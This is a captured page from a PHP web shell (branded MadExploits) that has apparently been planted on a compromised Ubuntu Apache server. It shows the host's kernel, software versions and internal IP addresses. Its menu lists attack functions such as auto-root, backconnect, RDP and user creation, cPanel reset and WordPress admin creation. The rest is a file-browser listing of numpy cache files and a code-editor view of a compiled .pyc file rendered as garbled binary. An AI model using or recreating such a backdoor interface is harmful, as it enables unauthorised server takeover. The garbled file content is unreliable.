Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
numpy /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__config__.cpython-310.pyc
3.59
KB
-rw-r--r--
__init__.cpython-310.pyc
10.84
KB
-rw-r--r--
_distributor_init.cpython-310....
489
B
-rw-r--r--
_globals.cpython-310.pyc
3.24
KB
-rw-r--r--
_pytesttester.cpython-310.pyc
5.59
KB
-rw-r--r--
_version.cpython-310.pyc
466
B
-rw-r--r--
conftest.cpython-310.pyc
3.24
KB
-rw-r--r--
ctypeslib.cpython-310.pyc
14.27
KB
-rw-r--r--
dual.cpython-310.pyc
2.05
KB
-rw-r--r--
matlib.cpython-310.pyc
10.1
KB
-rw-r--r--
setup.cpython-310.pyc
886
B
-rw-r--r--
version.cpython-310.pyc
490
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : matlib.cpython-310.pyc
o 6��a}( � @ s� d dl Z e jdedd� d dlZd dlmZmZ d dlT ejZej dd� Z e g d�7 Z dd d �Z ddd�Zdd d�Zddd�Z dd edfdd�Zdd� Zdd� Zdd� ZdS )� Na Importing from numpy.matlib is deprecated since 1.19.0. The matrix subclass is not the recommended way to represent matrices or deal with linear algebra (see https://docs.scipy.org/doc/numpy/user/numpy-for-matlab-users.html). Please adjust your code to use regular ndarray. � )� stacklevel)�matrix�asmatrix)�*)�rand�randn�repmat�Cc C s t jt| ||d�S )a2 Return a new matrix of given shape and type, without initializing entries. Parameters ---------- shape : int or tuple of int Shape of the empty matrix. dtype : data-type, optional Desired output data-type. order : {'C', 'F'}, optional Whether to store multi-dimensional data in row-major (C-style) or column-major (Fortran-style) order in memory. See Also -------- empty_like, zeros Notes ----- `empty`, unlike `zeros`, does not set the matrix values to zero, and may therefore be marginally faster. On the other hand, it requires the user to manually set all the values in the array, and should be used with caution. Examples -------- >>> import numpy.matlib >>> np.matlib.empty((2, 2)) # filled with random data matrix([[ 6.76425276e-320, 9.79033856e-307], # random [ 7.39337286e-309, 3.22135945e-309]]) >>> np.matlib.empty((2, 2), dtype=int) matrix([[ 6600475, 0], # random [ 6586976, 22740995]]) ��order)�ndarray�__new__r )�shape�dtyper � r �./usr/lib/python3/dist-packages/numpy/matlib.py�empty s $r c C � t jt| ||d�}|�d� |S )a� Matrix of ones. Return a matrix of given shape and type, filled with ones. Parameters ---------- shape : {sequence of ints, int} Shape of the matrix dtype : data-type, optional The desired data-type for the matrix, default is np.float64. order : {'C', 'F'}, optional Whether to store matrix in C- or Fortran-contiguous order, default is 'C'. Returns ------- out : matrix Matrix of ones of given shape, dtype, and order. See Also -------- ones : Array of ones. matlib.zeros : Zero matrix. Notes ----- If `shape` has length one i.e. ``(N,)``, or is a scalar ``N``, `out` becomes a single row matrix of shape ``(1,N)``. Examples -------- >>> np.matlib.ones((2,3)) matrix([[1., 1., 1.], [1., 1., 1.]]) >>> np.matlib.ones(2) matrix([[1., 1.]]) r � �r r r �fill�r r r �ar r r �ones>